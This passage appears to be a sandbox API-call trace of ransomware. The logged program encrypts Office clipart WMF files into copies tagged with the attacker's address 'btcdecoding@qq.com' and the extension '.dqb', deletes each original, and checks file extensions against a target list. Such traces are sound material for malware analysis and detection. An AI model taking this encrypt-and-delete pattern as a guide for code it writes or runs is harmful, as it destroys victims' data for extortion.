lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0060.175] WriteFile (in: hFile=0x204, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.175] SetEndOfFile (hFile=0x204) returned 1 [0060.175] CloseHandle (hObject=0x204) returned 1 [0060.175] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.175] SetEndOfFile (hFile=0x150) returned 1 [0060.176] CloseHandle (hObject=0x150) returned 1 [0060.176] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0060.176] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01178_.wmf")) returned 1 [0060.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63 [0060.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63 [0060.177] lstrlenW (lpString=".doc") returned 4 [0060.177] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.177] lstrlenW (lpString=".docx") returned 5 [0060.177] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.177] lstrlenW (lpString=".pdf") returned 4 [0060.177] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.177] lstrlenW (lpString=".xls") returned 4 [0060.177] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.177] lstrlenW (lpString=".xlsx") returned 5 [0060.177] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.177] lstrlenW (lpString=".ppt") returned 4 [0060.177] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63 [0060.178] lstrlenW (lpString=".zip") returned 4 [0060.178] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.178] lstrlenW (lpString=".rar") returned 4 [0060.178] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.178] lstrlenW (lpString=".bz2") returned 4 [0060.178] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.178] lstrlenW (lpString=".7z") returned 3 [0060.178] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63 [0060.178] lstrlenW (lpString=".dbf") returned 4 [0060.178] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63 [0060.178] lstrlenW (lpString=".1cd") returned 4 [0060.178] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01178_.WMF") returned 63 [0060.178] lstrlenW (lpString=".jpg") returned 4 [0060.178] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.178] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.178] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01179_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0060.179] GetLastError () returned 0x0 [0060.179] ReadFile (in: hFile=0x150, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x7e8, lpOverlapped=0x0) returned 1 [0060.180] WriteFile (in: hFile=0x204, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x7f0, lpOverlapped=0x0) returned 1 [0060.181] ReadFile (in: hFile=0x150, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0060.181] WriteFile (in: hFile=0x204, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.181] SetEndOfFile (hFile=0x204) returned 1 [0060.181] CloseHandle (hObject=0x204) returned 1 [0060.181] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.181] SetEndOfFile (hFile=0x150) returned 1 [0060.182] CloseHandle (hObject=0x150) returned 1 [0060.182] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0060.182] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01179_.wmf")) returned 1 [0060.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63 [0060.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63 [0060.183] lstrlenW (lpString=".doc") returned 4 [0060.183] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.183] lstrlenW (lpString=".docx") returned 5 [0060.183] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.183] lstrlenW (lpString=".pdf") returned 4 [0060.183] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.183] lstrlenW (lpString=".xls") returned 4 [0060.183] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.183] lstrlenW (lpString=".xlsx") returned 5 [0060.183] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.183] lstrlenW (lpString=".ppt") returned 4 [0060.183] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63 [0060.183] lstrlenW (lpString=".zip") returned 4 [0060.183] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.183] lstrlenW (lpString=".rar") returned 4 [0060.183] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.183] lstrlenW (lpString=".bz2") returned 4 [0060.183] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.183] lstrlenW (lpString=".7z") returned 3 [0060.183] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63 [0060.183] lstrlenW (lpString=".dbf") returned 4 [0060.183] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63 [0060.183] lstrlenW (lpString=".1cd") returned 4 [0060.183] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF") returned 63 [0060.183] lstrlenW (lpString=".jpg") returned 4 [0060.183] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0060.184] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.184] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.184] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01180_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0060.184] GetLastError () returned 0x0 [0060.184] ReadFile (in: hFile=0x150, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x824, lpOverlapped=0x0) returned 1 [0060.488] WriteFile (in: hFile=0x204, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x830, lpOverlapped=0x0) returned 1 [0060.489] ReadFile (in: hFile=0x150, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0060.489] WriteFile (in: hFile=0x204, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0060.489] SetEndOfFile (hFile=0x204) returned 1 [0060.502] CloseHandle (hObject=0x204) returned 1 [0060.502] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0060.502] SetEndOfFile (hFile=0x150) returned 1 [0060.538] CloseHandle (hObject=0x150) returned 1 [0060.538] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0060.562] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01180_.wmf")) returned 1 [0060.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63 [0060.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63 [0060.562] lstrlenW (lpString=".doc") returned 4 [0060.562] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0060.562] lstrlenW (lpString=".docx") returned 5 [0060.562] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0060.562] lstrlenW (lpString=".pdf") returned 4 [0060.562] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0060.562] lstrlenW (lpString=".xls") returned 4 [0060.562] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0060.562] lstrlenW (lpString=".xlsx") returned 5 [0060.562] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0060.562] lstrlenW (lpString=".ppt") returned 4 [0060.562] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0060.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63 [0060.562] lstrlenW (lpString=".zip") returned 4 [0060.562] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0060.562] lstrlenW (lpString=".rar") returned 4 [0060.562] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0060.563] lstrlenW (lpString=".bz2") returned 4 [0060.563] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0060.563] lstrlenW (lpString=".7z") returned 3 [0060.563] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0060.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63 [0060.563] lstrlenW (lpString=".dbf") returned 4 [0060.563] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0060.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63 [0060.563] lstrlenW (lpString=".1cd") returned 4 [0060.563] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0060.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01180_.WMF") returned 63 [0060.563] lstrlenW (lpString=".jpg") returned 4 [0060.563] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0061.849] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0061.849] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0061.849] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01772_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0061.849] GetLastError () returned 0x0 [0061.849] ReadFile (in: hFile=0x1e4, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x8fc, lpOverlapped=0x0) returned 1 [0061.852] WriteFile (in: hFile=0x21c, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x900, lpOverlapped=0x0) returned 1 [0061.861] ReadFile (in: hFile=0x1e4, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0061.862] WriteFile (in: hFile=0x21c, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0061.862] SetEndOfFile (hFile=0x21c) returned 1 [0061.862] CloseHandle (hObject=0x21c) returned 1 [0061.862] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0061.862] SetEndOfFile (hFile=0x1e4) returned 1 [0061.863] CloseHandle (hObject=0x1e4) returned 1 [0061.863] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0061.863] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01772_.wmf")) returned 1 [0061.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 63 [0061.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 63 [0061.863] lstrlenW (lpString=".doc") returned 4 [0061.863] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0061.863] lstrlenW (lpString=".docx") returned 5 [0061.863] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0061.863] lstrlenW (lpString=".pdf") returned 4 [0061.863] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0061.863] lstrlenW (lpString=".xls") returned 4 [0061.863] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0061.863] lstrlenW (lpString=".xlsx") returned 5 [0061.864] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0061.864] lstrlenW (lpString=".ppt") returned 4 [0061.864] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0061.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 63 [0061.864] lstrlenW (lpString=".zip") returned 4 [0061.864] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0061.864] lstrlenW (lpString=".rar") returned 4 [0061.864] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0061.864] lstrlenW (lpString=".bz2") returned 4 [0061.864] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0061.864] lstrlenW (lpString=".7z") returned 3 [0061.864] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0061.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 63 [0061.864] lstrlenW (lpString=".dbf") returned 4 [0061.864] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0061.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 63 [0061.864] lstrlenW (lpString=".1cd") returned 4 [0061.864] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0061.864] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01772_.WMF") returned 63 [0061.864] lstrlenW (lpString=".jpg") returned 4 [0061.864] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0061.864] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0061.865] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0061.865] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01793_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0061.865] GetLastError () returned 0x0 [0061.865] ReadFile (in: hFile=0x1e4, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0xcb4, lpOverlapped=0x0) returned 1 [0061.866] WriteFile (in: hFile=0x21c, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xcc0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xcc0, lpOverlapped=0x0) returned 1 [0061.867] ReadFile (in: hFile=0x1e4, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0061.867] WriteFile (in: hFile=0x21c, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0061.867] SetEndOfFile (hFile=0x21c) returned 1 [0061.867] CloseHandle (hObject=0x21c) returned 1 [0061.867] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0061.868] SetEndOfFile (hFile=0x1e4) returned 1 [0061.868] CloseHandle (hObject=0x1e4) returned 1 [0061.868] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0061.868] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01793_.wmf")) returned 1 [0061.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63 [0061.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63 [0061.869] lstrlenW (lpString=".doc") returned 4 [0061.869] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0061.869] lstrlenW (lpString=".docx") returned 5 [0061.869] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0061.869] lstrlenW (lpString=".pdf") returned 4 [0061.869] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0061.869] lstrlenW (lpString=".xls") returned 4 [0061.869] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0061.869] lstrlenW (lpString=".xlsx") returned 5 [0061.869] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0061.869] lstrlenW (lpString=".ppt") returned 4 [0061.869] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0061.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63 [0061.869] lstrlenW (lpString=".zip") returned 4 [0061.869] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0061.869] lstrlenW (lpString=".rar") returned 4 [0061.869] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0061.869] lstrlenW (lpString=".bz2") returned 4 [0061.869] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0061.869] lstrlenW (lpString=".7z") returned 3 [0061.869] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0061.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63 [0061.869] lstrlenW (lpString=".dbf") returned 4 [0061.869] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0061.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63 [0061.870] lstrlenW (lpString=".1cd") returned 4 [0061.870] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0061.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01793_.WMF") returned 63 [0061.870] lstrlenW (lpString=".jpg") returned 4 [0061.870] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0061.870] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0061.870] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0061.870] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00010_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0061.870] GetLastError () returned 0x0 [0061.870] ReadFile (in: hFile=0x1e4, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x566, lpOverlapped=0x0) returned 1 [0061.872] WriteFile (in: hFile=0x21c, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x570, lpOverlapped=0x0) returned 1 [0061.873] ReadFile (in: hFile=0x1e4, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0061.873] WriteFile (in: hFile=0x21c, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0061.873] SetEndOfFile (hFile=0x21c) returned 1 [0061.874] CloseHandle (hObject=0x21c) returned 1 [0061.874] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0061.874] SetEndOfFile (hFile=0x1e4) returned 1 [0061.874] CloseHandle (hObject=0x1e4) returned 1 [0061.874] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0061.875] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00010_.wmf")) returned 1 [0061.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63 [0061.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63 [0061.875] lstrlenW (lpString=".doc") returned 4 [0061.875] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0061.875] lstrlenW (lpString=".docx") returned 5 [0061.875] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0061.875] lstrlenW (lpString=".pdf") returned 4 [0061.875] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0061.875] lstrlenW (lpString=".xls") returned 4 [0061.875] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0061.875] lstrlenW (lpString=".xlsx") returned 5 [0061.875] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0061.875] lstrlenW (lpString=".ppt") returned 4 [0061.875] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0061.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00010_.WMF") returned 63 [0061.875] lstrlenW 